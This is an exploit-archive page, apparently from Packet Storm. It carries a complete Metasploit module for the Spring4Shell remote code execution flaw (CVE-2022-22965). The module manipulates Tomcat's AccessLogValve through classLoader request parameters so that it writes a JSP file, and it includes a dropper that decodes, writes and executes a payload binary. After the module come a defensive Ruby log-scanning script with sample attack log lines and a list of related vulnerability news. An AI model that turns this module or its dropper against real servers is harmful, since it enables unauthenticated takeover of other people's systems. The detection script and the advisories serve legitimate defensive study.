Spring4Shell Spring Framework Class Property Remote Code Execution

Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.

Packet Storm
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking # It's going to manipulate the Class Loader

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Spring Framework Class property RCE (Spring4Shell)',
        'Description' => %q{
          Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above
          and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable
          to remote code execution due to an unsafe data binding used to populate an object from request parameters
          to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the
          org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:
          class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can
          gain remote code execution.
        },
        'Author' => [
          'vleminator <vleminator[at]gmail.com>'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2022-22965'],
          ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],
          ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],
          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']
        ],
        'Platform' => %w[linux win],
        'Payload' => {
          'Space' => 5000,
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Java',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => %w[linux win]
            },
          ],
          [
            'Linux',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Platform' => 'linux'
            }
          ],
          [
            'Windows',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Platform' => 'win'
            }
          ]
        ],
        'DisclosureDate' => '2022-03-31',
        'DefaultTarget' => 0,
        'Notes' => {
          'AKA' => ['Spring4Shell', 'SpringShell'],
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),
        OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),
        OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),
      ]
    )

    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def jsp_dropper(file, exe)
    # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.
    dropper = <<~EOS
      <%@ page import=\"java.io.FileOutputStream\" %>
      <%@ page import=\"java.util.Base64\" %>
      <%@ page import=\"java.io.File\" %>
      <%
        FileOutputStream oFile = new FileOutputStream(\"#{file}\", false);
        oFile.write(Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(exe)}\"));
        oFile.flush();
        oFile.close();
        File f = new File(\"#{file}\");
        f.setExecutable(true);
        Runtime.getRuntime().exec(\"#{file}\");
      %>
    EOS

    dropper
  end

  def modify_class_loader(method, opts)
    cl_prefix = 'class.module.classLoader'

    send_request_cgi({
      'uri' => normalize_uri(target_uri.path.to_s),
      'version' => '1.1',
      'method' => method,
      'headers' => {
        'c1' => '<%', # %{c1}i replacement in payload
        'c2' => '%>' # %{c2}i replacement in payload
      },
      "vars_#{method == 'GET' ? 'get' : 'post'}" => {
        "#{cl_prefix}.resources.context.parent.pipeline.first.pattern" => opts[:payload],
        "#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory],
        "#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix],
        "#{cl_prefix}.resources.context.parent.pipeline.first.suffix" => opts[:suffix],
        "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
      }
    })
  end

  def check_log_file
    print_status("#{peer} - Waiting for the server to flush the logfile")
    print_status("#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}")

    succeeded = retry_until_true(timeout: 60) do
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(@jsp_file)
      })
      res&.code == 200 && !res.body.blank?
    end

    fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless succeeded
    print_good("#{peer} - Log file flushed")
  end

  # Fix the JSP payload to make it valid once it is dropped
  # to the log file
  def fix(jsp)
    output = ''
    jsp.each_line do |l|
      if l =~ /<%.*%>/
        output << l
      elsif l =~ /<%/
        next
      elsif l =~ /%>/
        next
      elsif l.chomp.empty?
        next
      else
        output << "<% #{l.chomp} %>"
      end
    end
    output
  end

  def create_jsp
    jsp = <<~EOS
      <%
        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{@jsp_file}");
        jsp.delete();
      %>
      #{Faker::Internet.uuid}
    EOS

    if target['Arch'] == ARCH_JAVA
      jsp << fix(payload.encoded)
    else
      payload_exe = generate_payload_exe
      payload_filename = rand_text_alphanumeric(rand(4..7))
      if target['Platform'] == 'win'
        payload_path = datastore['WritableDir'] + '\\' + payload_filename
      else
        payload_path = datastore['WritableDir'] + '/' + payload_filename
      end
      jsp << jsp_dropper(payload_path, payload_exe)
      register_files_for_cleanup(payload_path)
    end

    jsp
  end

  def check
    @checkcode = _check
  end

  def _check
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))
    )
    return CheckCode::Unknown('Web server seems unresponsive') unless res

    if res.headers.key?('Server')
      res.headers['Server'].match(%r{(.*)/([\d|.]+)$})
    else
      res.body.match(%r{Apache\s(.*)/([\d|.]+)})
    end
    server = Regexp.last_match(1) || nil
    version = Rex::Version.new(Regexp.last_match(2)) || nil

    return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)

    vprint_status("Detected #{server} #{version} running")

    if datastore['HTTP_METHOD'] == 'Automatic'
      # prefer POST over GET to keep the vars out of the query string if possible
      methods = %w[POST GET]
    else
      methods = [ datastore['HTTP_METHOD'] ]
    end

    methods.each do |method|
      vars = "vars_#{method == 'GET' ? 'get' : 'post'}"
      res = send_request_cgi(
        'method' => method,
        'uri' => normalize_uri(datastore['TARGETURI']),
        vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }
      )
      # setting the default assertion status to a valid status
      send_request_cgi(
        'method' => method,
        'uri' => normalize_uri(datastore['TARGETURI']),
        vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }
      )
      return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    prefix_jsp = rand_text_alphanumeric(rand(3..5))
    date_format = rand_text_numeric(rand(1..4))
    @jsp_file = prefix_jsp + date_format + '.jsp'

    http_method = datastore['HTTP_METHOD']
    if http_method == 'Automatic'
      # if the check was skipped but we need to automatically identify the method, we have to run it here
      @checkcode = check if @checkcode.nil?
      http_method = @checkcode.details[:method]
      fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?
      print_good("Automatically identified HTTP method: #{http_method}")
    end

    # if the check method ran automatically, add a short delay before continuing with exploitation
    sleep(5) if @checkcode

    # Prepare the JSP
    print_status("#{peer} - Generating JSP...")
    # rubocop:disable  Style/FormatStringToken
    jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')
    # rubocop:enable  Style/FormatStringToken

    # Modify the Class Loader
    print_status("#{peer} - Modifying Class Loader...")
    properties = {
      payload: jsp,
      directory: datastore['PAYLOAD_PATH'],
      prefix: prefix_jsp,
      suffix: '.jsp',
      file_date_format: date_format
    }
    res = modify_class_loader(http_method, properties)
    unless res
      fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
    end

    # No matter what happened, try to 'restore' the Class Loader
    properties = {
      payload: '',
      directory: '',
      prefix: '',
      suffix: '',
      file_date_format: ''
    }
    modify_class_loader(http_method, properties)

    check_log_file

    handler
  end

  # Retry the block until it returns a truthy value. Each iteration attempt will
  # be performed with exponential backoff. If the timeout period is exceeded, false is returned.
  def retry_until_true(timeout:)
    start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)
    ending_time = start_time + timeout
    retry_count = 0
    while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time
      result = yield
      return result if result

      retry_count += 1
      remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)
      break if remaining_time_budget <= 0

      delay = 2**retry_count
      if delay >= remaining_time_budget
        delay = remaining_time_budget
        vprint_status("Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}")
      else
        vprint_status("Sleeping for #{delay} seconds before attempting again")
      end
      sleep delay
    end

    false
  end
end
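As an added detection example (not part of the Packet Storm listing or the Metasploit module), the Ruby script below scans constructed Tomcat combined-format access log lines for the request parameters the module sends: the class.module.classLoader.DefaultAssertionStatus probe that its check expects to answer 400, and the AccessLogValve pattern/directory/prefix/suffix/fileDateFormat properties used to write the JSP. Segment matching is case-insensitive because, as CVE-2022-22968 below notes, disallowedFields patterns were case sensitive, so a path starting with Class.module binds as well; the log lines and IP addresses are constructed samples.

```ruby
require 'cgi'

# Any dotted property path that reaches the Tomcat ClassLoader through Spring's
# data binder (case-insensitive, see CVE-2022-22968: "Class.module..." binds too).
CLASSLOADER_PATH = /\A(?:.+\.)?class\.module\.classloader(?:\.|\z)/i
# The AccessLogValve properties the module sets to turn the access log into a JSP.
ACCESSLOG_VALVE_PATH = /resources\.context\.parent\.pipeline\.first\.(pattern|directory|prefix|suffix|fileDateFormat)\z/i

# Combined log format: host ident user [time] "METHOD URI PROTO" status ...
LOG_RE = /\A(?<host>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<uri>\S+) [^"]*" (?<status>\d{3})/

# Map decoded parameter names to findings; empty array means nothing suspicious.
def classify_params(param_names)
  param_names.each_with_object([]) do |name, findings|
    next unless name.match?(CLASSLOADER_PATH)
    if name.match?(ACCESSLOG_VALVE_PATH)
      findings << "accesslogvalve:#{name.split('.').last}"
    elsif name =~ /DefaultAssertionStatus\z/i
      findings << 'probe:DefaultAssertionStatus' # the module's check() request
    else
      findings << "classloader:#{name}"
    end
  end
end

# Parse one access log line; returns nil for lines that do not parse.
def analyze_log_line(line)
  return nil unless (m = LOG_RE.match(line))
  query = m[:uri].split('?', 2)[1]
  params = query ? CGI.parse(query).keys : [] # CGI.parse URL-decodes the names
  findings = classify_params(params)
  # A 400 response to a classLoader property is exactly what check() looks for.
  findings << 'check:400-on-classloader' if m[:status] == '400' && !findings.empty?
  { host: m[:host], method: m[:method], status: m[:status].to_i, findings: findings }
end

# Return only the records that carry at least one finding.
def scan_log(text)
  text.each_line.map { |l| analyze_log_line(l.strip) }.compact.select { |r| r[:findings].any? }
end

# Constructed sample: a check() probe, a GET-based valve manipulation, and benign traffic.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Mar/2022:10:01:02 +0000] "GET /app/example/HelloWorld.action?class.module.classLoader.DefaultAssertionStatus=abcd HTTP/1.1" 400 1234 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Mar/2022:10:01:08 +0000] "GET /app/example/HelloWorld.action?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Mar/2022:10:02:00 +0000] "GET /app/example/HelloWorld.action?name=Alice HTTP/1.1" 200 512 "-" "Mozilla/5.0"
LOG

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |r|
    puts "#{r[:host]} #{r[:method]} #{r[:status]} -> #{r[:findings].join(', ')}"
  end
end
```

The module prefers POST, whose body never reaches the access log, so log review only catches the GET fallback; a request-level filter or WAF rule on the same parameter names sees both methods.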

Related news

CVE-2023-41726

Ivanti Avalanche Incorrect Default Permissions allows Local Privilege Escalation Vulnerability

CVE-2023-28069: DSA-2022-258: Dell Streaming Data Platform Security Update for Multiple Third-Party Component Vulnerabilities

Dell Streaming Data Platform prior to 1.4 contains an Open Redirect vulnerability. An attacker with the same privileges as a legitimate user can phish that user into being redirected to a malicious website, leading to information disclosure and the launch of phishing attacks.

CVE-2022-36975

This vulnerability allows remote attackers to bypass authentication on affected installations of Ivanti Avalanche 6.3.2.3490. The specific flaw exists within the ProfileDaoImpl class. A crafted request can trigger execution of SQL queries composed from a user-supplied string. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-15332.

CVE-2023-21850: Oracle Critical Patch Update Advisory - January 2023

Vulnerability in the Oracle Demantra Demand Management product of Oracle Supply Chain (component: E-Business Collections). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Demantra Demand Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Demantra Demand Management accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).

4 over-hyped security vulnerabilities of 2022

What does it take to make the discussion of vulnerabilities useful? And where did this go wrong in 2022? The post 4 over-hyped security vulnerabilities of 2022 appeared first on Malwarebytes Labs.

CVE-2022-38765: Canon Medical Software Security Updates

Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.

CVE-2022-43484: About CVE-2022-43484

TERASOLUNA Global Framework 1.0.0 (Public review version) and TERASOLUNA Server Framework for Java (Rich) 2.0.0.2 to 2.0.5.1 are vulnerable to a ClassLoader manipulation vulnerability due to using an old version of Spring Framework which contains the vulnerability. The vulnerability is caused by an improper input validation issue in the binding mechanism of Spring MVC. When the application processes a specially crafted file, arbitrary code may be executed with the privileges of the application.

CVE-2022-21587: Oracle Critical Patch Update Advisory - October 2022

Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

CVE-2022-34102: Crestron Electronics, Inc.

Insufficient access control vulnerability was discovered in the Crestron AirMedia Windows Application, version 4.3.1.39, in which a user can pause the uninstallation of an executable to gain a SYSTEM level command prompt.

CVE-2022-32427: Security Bulletin | Printerlogic

PrinterLogic Windows Client through 25.0.0.676 allows attackers to execute directory traversal. Authenticated users with prior knowledge of the driver filename could exploit this to escalate privileges or distribute malicious content.

Hackers Exploited Atlassian Confluence Bug to Deploy Ljl Backdoor for Espionage

A threat actor is said to have "highly likely" exploited a security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector. The attack, which transpired over a seven-day-period during the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch

Apple Just Patched 37 iPhone Security Bugs

Plus: A Google Chrome patch licks the DevilsTongue spyware, Android’s kernel gets a tune-up, and Microsoft fixes 84 flaws.

CVE-2022-21586: Oracle Critical Patch Update Advisory - July 2022

Vulnerability in the Oracle Banking Trade Finance product of Oracle Financial Services Applications (component: Infrastructure). The supported version that is affected is 14.5. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Banking Trade Finance. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Banking Trade Finance accessible data as well as unauthorized access to critical data or complete access to all Oracle Banking Trade Finance accessible data. CVSS 3.1 Base Score 6.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N).

Red Hat Security Advisory 2022-4880-01

Red Hat Security Advisory 2022-4880-01 - Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS). The updated image includes bug fixes and feature improvements. Issues addressed include a bypass vulnerability.

RHSA-2022:4880: Red Hat Security Advisory: ACS 3.70 enhancement and security update

Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS). The updated image includes bug fixes and feature improvements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: CVE-2021-23820: json-pointer: type confusion vulnerability can lead to a bypass of CVE-2020-7709 when the pointer components are arrays; CVE-2021-41190: opencontainers: OCI manifest and index parsing confusion.

CVE-2022-28874: Security advisories

Multiple Denial-of-Service vulnerabilities were discovered in F-Secure Atlant and in certain WithSecure products: scanning fuzzed PE32-bit files causes memory corruption and a heap buffer overflow, which can eventually crash the scanning engine. The exploit can be triggered remotely by an attacker.

Ruijie Reyee Mesh Router Remote Code Execution

Ruijie Reyee mesh routers with ReyeeOS version 1.55.1915 EW_3.0(1)B11P35 and EW_3.0(1)B11P55 suffer from a remote code execution vulnerability.

CVE-2022-21496: Oracle Critical Patch Update Advisory - April 2022

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service ...

CVE-2022-22968: CVE-2022-22968 | Security

In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path.

Microsoft’s Response to CVE-2022-22965 Spring Framework

Summary: Microsoft used the Spring Framework RCE Early Announcement to inform its analysis of the remote code execution vulnerability CVE-2022-22965, disclosed on 31 Mar 2022. We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability.
